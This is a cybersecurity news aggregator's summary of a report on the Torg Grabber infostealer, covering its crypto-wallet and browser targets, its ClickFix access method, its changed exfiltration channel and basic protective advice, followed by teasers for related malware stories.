CP
cyberpings
Malware & RansomwareHIGH

Torg Grabber - New Infostealer Targets 728 Crypto Wallets

BCBleepingComputer·Reporting by Bill Toulas
Summary by CyberPings Editorial·AI-assisted·Reviewed by Rohit Rana
Updated:
🎯

Basically, Torg Grabber is a new malware stealing data from many cryptocurrency wallets.

Quick Summary

Torg Grabber malware is stealing sensitive data from over 700 crypto wallets. This poses significant risks to users' financial security. Stay informed and protect your assets.

What Happened

A new infostealer malware named Torg Grabber has emerged, targeting sensitive data from 850 browser extensions, with a staggering 728 of these extensions dedicated to cryptocurrency wallets. The malware gains initial access using a technique called ClickFix, which hijacks the clipboard and tricks users into executing a malicious PowerShell command. Researchers from Gen Digital report that Torg Grabber is actively developed, with 334 unique samples compiled in just three months, indicating a rapid evolution in its capabilities.

The malware's development has seen a shift in its communication methods. Initially, it used a Telegram-based system for data exfiltration, but this was replaced with an HTTPS connection routed through Cloudflare infrastructure. This change allows for chunked data uploads and payload delivery, enhancing its stealth and effectiveness.

Who's Being Targeted

Torg Grabber is particularly dangerous for cryptocurrency users. It targets 25 Chromium-based browsers and 8 Firefox variants, attempting to steal credentials, cookies, and autofill data. Some of the most popular wallets targeted include MetaMask, TrustWallet, and Coinbase. The malware's reach extends to 103 password managers and various other applications, including Discord, Telegram, and Steam.

The sheer number of extensions affected means that many users may not even be aware that their wallets are at risk. The malware's ability to infiltrate a wide array of applications makes it a significant threat to anyone involved in cryptocurrency transactions.

Signs of Infection

Users should be vigilant for signs of infection from Torg Grabber. The malware can create a hardware fingerprint, take screenshots, and even execute shellcode on compromised devices. It also documents installed software, including antivirus tools, which indicates its sophisticated evasion techniques. If you notice unusual activity in your cryptocurrency wallets or password managers, it may be a sign of Torg Grabber's presence.

How to Protect Yourself

To safeguard against Torg Grabber, users should take proactive measures:

  • Update your software regularly to patch vulnerabilities.
  • Use multi-factor authentication for your cryptocurrency wallets and sensitive accounts.
  • Monitor your accounts for unauthorized transactions or changes.
  • Educate yourself about phishing techniques to avoid falling victim to ClickFix or similar methods.

Staying informed and vigilant is key to protecting your digital assets from evolving threats like Torg Grabber.

🔒 Pro insight: Torg Grabber's rapid development and extensive targeting reflect a growing trend in malware sophistication, particularly in the cryptocurrency sector.

Original article from

BCBleepingComputer· Bill Toulas
Read Full Article

Also covered by

CYCyber Security News

New Torg Grabber Stealer Moves From Telegram Exfiltration to Encrypted REST API C2

Read Article

Share

Related Pings

HIGHMalware & Ransomware

Malware Newsletter Round 91 - Latest Threats and Insights

The latest malware newsletter reveals new threats like Infiniti Stealer and npm supply chain attacks. Developers and organizations must stay alert to evolving risks in cybersecurity.

Security Affairs·
HIGHMalware & Ransomware

Malicious Email Delivers CMD Malware - Privilege Escalation Alert

A malicious email has delivered a .cmd malware file that escalates privileges and bypasses antivirus systems. Users are at risk of significant system compromise. Awareness and immediate action are vital to mitigate this threat.

Security Affairs·
HIGHMalware & Ransomware

Axios NPM Package Compromised - Supply Chain Attack Exposed

A major supply chain attack compromised the Axios NPM package, affecting millions of users. Malicious versions deployed a RAT, posing serious security risks. Swift action was taken to remove the threats.

Trend Micro Research·
HIGHMalware & Ransomware

Brokk Hacked - Play Ransomware Exposes Sensitive Data

Brokk has reportedly been hacked by Play ransomware, leading to the leak of sensitive corporate data. This incident could severely impact the company's reputation and security. Organizations must bolster their defenses to prevent similar breaches.

SC Media·
HIGHMalware & Ransomware

Chaos Malware - New Targeting of 64-bit Linux Servers

Chaos malware has evolved to target 64-bit Linux servers, expanding its attack surface. This shift raises alarms for organizations relying on these systems. Enhanced security measures are now crucial to protect against potential larger-scale attacks.

SC Media·
HIGHMalware & Ransomware

Phorpiex Botnet - Spreading Ransomware and Sextortion Tactics

The notorious Phorpiex botnet is back, spreading ransomware and sextortion schemes. Millions are at risk as it targets users globally. Stay alert and protect your devices from this evolving threat.

Cyber Security News·